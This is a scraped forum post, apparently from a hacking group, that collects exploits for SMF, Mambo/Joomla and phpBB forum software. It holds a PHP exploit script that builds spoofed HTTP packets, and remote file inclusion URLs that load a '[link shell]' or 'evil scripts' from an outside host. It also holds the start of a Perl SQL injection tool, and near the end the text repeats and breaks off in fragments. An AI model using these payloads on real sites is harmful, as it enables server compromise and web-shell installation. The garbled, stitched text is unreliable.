7d61bcd1f033e Content-Disposition: form-data; name="attachment[]"; filename="" Content-Type: application/octet-stream 7d61bcd1f033e Content-Disposition: form-data; name="post" Post 7d61bcd1f033e Content-Disposition: form-data; name="num_replies" '.$replies.' 7d61bcd1f033e Content-Disposition: form-data; name="additional_options" 1 7d61bcd1f033e Content-Disposition: form-data; name="sc" '.$sc.' 7d61bcd1f033e Content-Disposition: form-data; name="seqnum" 0 7d61bcd1f033e '; $packet="POST ".$p."index.php?action=post2;start=3;board=".$board." HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="X-FORWARDED-FOR: 1.1.1.1\r\n"; $packet.="Referer: http://".$host.$path."index.php?action=post;topic=1.0;num_replies=0\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: multipart/form-data; boundary= 7d61bcd1f033e\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n"; $packet.="Cookie: ".$cookie."\r\n\r\n"; $packet.=$data; sendpacketii($packet); $packet= "GET ".$p."index.php?action=post;topic=$topic.0;num_replies=1 HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="X-FORWARDED-FOR: 1.1.1.1\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"This topic is locked")) {echo "Exploit succeeded ";} else {echo "Exploit failed ";} ?> black_hat_cr(HCE) SMF Forum Mambo Component <= 1.3.1.3 Include Vulnerability ************************************************** ******** Joomla-SMF Forum Bridge For Mambo 4.5.3+ And Mambo 4.5.3+ Remote File Inclusion Vulnebrality ************************************************** ******** Discovered by : ASIANEAGLE Remote:Yes Level:High Application: SMF Forum 1.3.1.3 Bridge Component For Joomla And Mambo Vulnerable File: smf.php Exploit: http://[site]/[joomla or mambo path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[evil scripts] Fixing: 1.Declare variabel $mosConfig_absolute_path or; 2.Add into the top function: defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); Contact: mail: asianeagle@linuxmail.org website:http://asianeagle.to.md/ Greetz to: Muhacir, Turkmenux and All Turkish AND Turkmen Hackers *****ASIANEAGLE SECURITY***** baby_hacker(HCE) Tổng hợp 1 số Bug của phpBB ! 1- Remote File Inclusion : **phpBB Admin Topic Action File Include Vulnerability For: phpBB ( 2.0.x - 2.0.21 ) Version 0.95 Admin Topic Action Logging Trích: http://site.com/[phpBBpath]/admin/admin_topic_action_logging.php?setmodules= pagestar t&phpbb_root_path=http://[link shell] **Dimension of phpBB Remote File Inclusion Vulnerability For: Dimension of phpBB 0.2.5 (phpBB 2.0.21) Trích: http://site.com/[path]/includes/functions_kb.php?phpbb_root_path=http://[linkshell ] http://site.com/[path]/includes/themen_portal_mitte.php?phpbb_root_path=http://[l inkshell] http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[linkshe ll] **Security Suite IP Logger Remote File Inclusion Vulnerability For: phpBB ( 2.0.x - 2.0.21 ) Trích: http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[linkshe ll] 2- SQL Injection : ** All Topics Hack Sql injection For: phpBB ( 2.0.x - 2.0.21 ) Mod download: http://www.phpbbhacks.com/download/2821 Code: #!/usr/bin/perl use IO::Socket; print q{ => Insert URL => without ( http ) => }; $server = <STDIN>; chop ($server); print q{ => Insert directory => es: /forum/ - /phpBB2/ => }; . website:http://asianeagle.to.md/ Greetz to: Muhacir, Turkmenux and All Turkish AND Turkmen Hackers *****ASIANEAGLE SECURITY***** baby _hacker( HCE) Tổng hợp 1 số Bug của phpBB ! 1- Remote File Inclusion. http://".$host.$path."index.php?action=post;topic=1.0;num_replies=0 "; $packet.="Accept-Language: it "; $packet.="Content-Type: multipart/form-data; boundary= 7d61bcd1f033e "; $packet.="Accept-Encoding: gzip, deflate ";